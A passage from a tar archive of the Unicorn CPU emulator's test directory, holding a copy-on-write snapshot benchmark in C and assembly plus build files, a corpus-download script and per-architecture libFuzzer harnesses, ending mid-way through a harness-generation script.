�������������������������������unicorn-2.1.1/tests/benchmarks/cow/Makefile���������������������������������������������������������0000664�0000000�0000000�00000001077�14675241067�0020720�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������CFLAGS += -Wall -Werror -I../../../include CFLAGS += -D__USE_MINGW_ANSI_STDIO=1 LDLIBS += -L../../../build -lgsl -lgslcblas -lm -lunicorn UNAME_S := $(shell uname -s) LDLIBS += -pthread ifeq ($(UNAME_S), Linux) LDLIBS += -lrt endif #EXECUTE_VARS = LD_LIBRARY_PATH=../../cmocka/src:../../build/ DYLD_LIBRARY_PATH=../../build/ EXECUTE_VARS = LD_LIBRARY_PATH=../../../build/cmocka/src:../../../build/ DYLD_LIBRARY_PATH=../../../build/ TESTS_SOURCE = $(wildcard *.c) TESTS = $(TESTS_SOURCE:%.c=%) .PHONY: all clean test test: $(TESTS) all: $(TESTS) clean: rm -f $(TESTS) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/benchmarks/cow/benchmark.c������������������������������������������������������0000664�0000000�0000000�00000012615�14675241067�0021356�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <gsl/gsl_rstat.h> #include <time.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> struct data { gsl_rstat_workspace *rstat_p; struct timespec start; }; void update_stats(gsl_rstat_workspace *rstat_p, struct timespec *start, struct timespec *end) { double dur = (end->tv_sec - start->tv_sec) * 1000.0; dur += (end->tv_nsec - start->tv_nsec) / 1000000.0; gsl_rstat_add(dur, rstat_p); } static uint64_t CODEADDR = 0x1000; static uint64_t DATABASE = 0x40000000; static uint64_t BLOCKSIZE = 0x10000; /*static void callback_mem(uc_engine *uc, uc_mem_type type, uint64_t addr, uint32_t size, uint64_t value, void *data) { printf("callback mem valid: 0x%lX, value: 0x%lX\n", addr, value); }*/ static int callback_mem_prot(uc_engine *uc, uc_mem_type type, uint64_t addr, uint32_t size, int64_t value, void *data) { printf("callback mem prot: 0x%lX, type: %X\n", addr, type); return false; } static void callback_block(uc_engine *uc, uint64_t addr, uint32_t size, void *data) { struct timespec now; struct data *d = data; size_t run; uint64_t rax = 512; uint64_t rbx = DATABASE; uint64_t rsi; long memblock; long offset; clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &now); if (d->rstat_p) { update_stats(d->rstat_p, &d->start, &now); } else { d->rstat_p = gsl_rstat_alloc(); } run = gsl_rstat_n(d->rstat_p); if ((run >> 4) >= 20) { uc_emu_stop(uc); return; } else if (run > 0 && run % 16 == 0) { uc_snapshot(uc); } /* if (run > 0 && run % 16 == 0) { uc_emu_stop(uc); return; }*/ rsi = random(); memblock = random() & 15; offset = random() & (BLOCKSIZE - 1) & (~0xf); // memblock = 0; // offset = 0; if (memblock == 15 && (offset + 0x1000) > BLOCKSIZE) { offset -= 0x1000; } rbx += (memblock * BLOCKSIZE) + offset; printf("write at 0x%lX\n", rbx); printf("[%li] callback block: 0x%lX\n", run, addr); uc_reg_write(uc, UC_X86_REG_RBX, &rbx); uc_reg_write(uc, UC_X86_REG_RAX, &rax); uc_reg_write(uc, UC_X86_REG_RSI, &rsi); clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &d->start); } static void prepare_mapping(uc_engine *uc) { for (size_t i = 0; i < 16; i++) { printf("mem map: 0x%lX\n", DATABASE+i*BLOCKSIZE); uc_mem_map(uc, DATABASE+i*BLOCKSIZE, BLOCKSIZE, UC_PROT_READ|UC_PROT_WRITE); } } static void prepare_code(uc_engine *uc, const char *file, void **addr) { uc_err err; int fd; fd = open(file, O_RDONLY, 0); if (fd == -1) { perror("open"); exit(1); } *addr = mmap(*addr, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0); if (addr == MAP_FAILED) { perror("mmap"); exit(1); } err = uc_mem_map_ptr(uc, CODEADDR, 0x1000, UC_PROT_READ|UC_PROT_EXEC, *addr); close(fd); if (err != UC_ERR_OK) { printf("err: %s\n", uc_strerror(err)); exit(1); } printf("mapped %s\n", file); return; } void print_stats(gsl_rstat_workspace *rstat_p) { double mean, variance, largest, smallest, sd, rms, sd_mean, median, skew, kurtosis; size_t n; mean = gsl_rstat_mean(rstat_p); variance = gsl_rstat_variance(rstat_p); largest = gsl_rstat_max(rstat_p); smallest = gsl_rstat_min(rstat_p); median = gsl_rstat_median(rstat_p); sd = gsl_rstat_sd(rstat_p); sd_mean = gsl_rstat_sd_mean(rstat_p); skew = gsl_rstat_skew(rstat_p); rms = gsl_rstat_rms(rstat_p); kurtosis = gsl_rstat_kurtosis(rstat_p); n = gsl_rstat_n(rstat_p); printf ("The sample mean is %g\n", mean); printf ("The estimated variance is %g\n", variance); printf ("The largest value is %g\n", largest); printf ("The smallest value is %g\n", smallest); printf( "The median is %g\n", median); printf( "The standard deviation is %g\n", sd); printf( "The root mean square is %g\n", rms); printf( "The standard devation of the mean is %g\n", sd_mean); printf( "The skew is %g\n", skew); printf( "The kurtosis %g\n", kurtosis); printf( "There are %zu items in the accumulator\n", n); } int main(int argc, char *argv[]) { uc_engine *uc; uc_err err; uc_hook hook_block; uc_hook hook_mem; struct data d; uint64_t rax = 5; uint64_t rbx = DATABASE; void *bin_mmap = NULL; if (argc != 2) { fprintf(stderr, "usage: %s binary\n", argv[0]); return 1; } d.rstat_p = NULL; srandom(time(NULL)); uc_open(UC_ARCH_X86, UC_MODE_64, &uc); prepare_code(uc, argv[1], &bin_mmap); prepare_mapping(uc); err = uc_hook_add(uc, &hook_block, UC_HOOK_BLOCK, &callback_block, &d, CODEADDR, 0x1000); if (err != UC_ERR_OK) { return 1; } uc_hook_add(uc, &hook_mem, UC_HOOK_MEM_INVALID, &callback_mem_prot, NULL, CODEADDR, 0x1000); uc_reg_write(uc, UC_X86_REG_RBX, &rbx); uc_reg_write(uc, UC_X86_REG_RAX, &rax); /* err = uc_hook_add(uc, &hook_mem, UC_HOOK_MEM_VALID, &callback_mem, NULL, DATABASE, 16*BLOCKSIZE); if (err) { printf("err: %s\n", uc_strerror(err)); return 1; }*/ for (int i = 0; i < 1; i++) { err = uc_emu_start(uc, CODEADDR, -1, 0, 0); if (err) { printf("err: %s\n", uc_strerror(err)); return 1; } uc_snapshot(uc); } print_stats(d.rstat_p); return 0; } �������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/benchmarks/cow/binary.S���������������������������������������������������������0000664�0000000�0000000�00000000214�14675241067�0020660�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������USE64 DEFAULT REL SECTION .text loop: xor rcx, rcx write: mov [rbx+rcx*8], rsi inc rcx mov rdi, rax sub rdi, rcx jnz write jmp loop ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/���������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015344�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/Makefile�������������������������������������������������������������������0000664�0000000�0000000�00000000576�14675241067�0017014�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������CFLAGS += -L ../../ -I ../../include UNAME_S := $(shell uname -s) LDFLAGS += -pthread ifeq ($(UNAME_S), Linux) LDFLAGS += -lrt endif LDFLAGS += ../../libunicorn.a ALL_TESTS_SOURCES = $(wildcard fuzz*.c) ALL_TESTS = $(ALL_TESTS_SOURCES:%.c=%) .PHONY: all all: ${ALL_TESTS} .PHONY: clean clean: rm -rf ${ALL_TESTS} fuzz%: fuzz%.c $(CC) $(CFLAGS) $^ onedir.c $(LDFLAGS) -o $@ ����������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/dlcorpus.sh����������������������������������������������������������������0000664�0000000�0000000�00000000562�14675241067�0017536�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#/bin/sh #change to script directory cd `dirname $0` ls fuzz_emu*.c | sed 's/.c//' | while read target do #download public corpus wget "https://storage.googleapis.com/unicorn-backup.clusterfuzz-external.appspot.com/corpus/libFuzzer/unicorn_$target/public.zip" unzip -q public.zip -d corpus_$target #run target on corpus ./$target corpus_$target done ����������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu.options�����������������������������������������������������������0000664�0000000�0000000�00000000033�14675241067�0020621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[libfuzzer] max_len = 4096 �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm64_arm.c�������������������������������������������������������0000664�0000000�0000000�00000002672�14675241067�0021233�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ����������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm64_armbe.c�����������������������������������������������������0000664�0000000�0000000�00000002717�14675241067�0021542�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM64, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm_arm.c���������������������������������������������������������0000664�0000000�0000000�00000002670�14675241067�0021057�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm_armbe.c�������������������������������������������������������0000664�0000000�0000000�00000002715�14675241067�0021366�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM, UC_MODE_ARM + UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ���������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_arm_thumb.c�������������������������������������������������������0000664�0000000�0000000�00000002672�14675241067�0021421�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ����������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_m68k_be.c���������������������������������������������������������0000664�0000000�0000000�00000002700�14675241067�0020666�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ����������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_mips_32be.c�������������������������������������������������������0000664�0000000�0000000�00000002721�14675241067�0021221�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �����������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_mips_32le.c�������������������������������������������������������0000664�0000000�0000000�00000002724�14675241067�0021236�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ��������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_s390x_be.c��������������������������������������������������������0000664�0000000�0000000�00000002701�14675241067�0020770�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_S390X, UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } ���������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_sparc_32be.c������������������������������������������������������0000664�0000000�0000000�00000002721�14675241067�0021361�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �����������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_x86_16.c����������������������������������������������������������0000664�0000000�0000000�00000002667�14675241067�0020402�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_X86, UC_MODE_16, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_x86_32.c����������������������������������������������������������0000664�0000000�0000000�00000002667�14675241067�0020400�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/fuzz_emu_x86_64.c����������������������������������������������������������0000664�0000000�0000000�00000002667�14675241067�0020405�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> // memory address where emulation starts #define ADDRESS 0x1000000 uc_engine *uc; int initialized = 0; FILE * outfile = NULL; int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { uc_err err; if (initialized == 0) { if (outfile == NULL) { // we compute the output outfile = fopen("/dev/null", "w"); if (outfile == NULL) { printf("failed opening /dev/null\n"); abort(); return 0; } } initialized = 1; } // Not global as we must reset this structure // Initialize emulator in supplied mode err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); if (err != UC_ERR_OK) { printf("Failed on uc_open() with error returned: %u\n", err); abort(); } // map 4MB memory for this emulation uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, Data, Size)) { printf("Failed to write emulation code to memory, quit!\n"); abort(); } // emulate code in infinite time & 4096 instructions // avoid timeouts with infinite loops err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); if (err) { fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } uc_close(uc); return 0; } �������������������������������������������������������������������������unicorn-2.1.1/tests/fuzz/gentargets.sh��������������������������������������������������������������0000664�0000000�0000000�00000003313�14675241067�0020043�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#/bin/sh # generates all fuzz targets for different architectures from the template in fuzz_emu_x86_32.c sed 's/UC_MODE_32/UC_MODE_64/' fuzz_emu_x86_32.c > fuzz_emu_x86_64.c sed 's/UC_MODE_32/UC_MODE_16/' fuzz_emu_x86_32.c > fuzz_emu_x86_16.c sed 's/UC_ARCH_X86/UC_ARCH_SPARC/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN/' > fuzz_emu_sparc_32be.c #sed 's/UC_ARCH_X86/UC_ARCH_SPARC/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN/' > fuzz_emu_sparc_64be.c sed 's/UC_ARCH_X86/UC_ARCH_M68K/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_BIG_ENDIAN/' > fuzz_emu_m68k_be.c sed 's/UC_ARCH_X86/UC_ARCH_MIPS/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN/' > fuzz_emu_mips_32le.c sed 's/UC_ARCH_X86/UC_ARCH_MIPS/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN/' > fuzz_emu_mips_32be.c sed 's/UC_ARCH_X86/UC_ARCH_ARM64/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM/' > fuzz_emu_arm64_arm.c sed 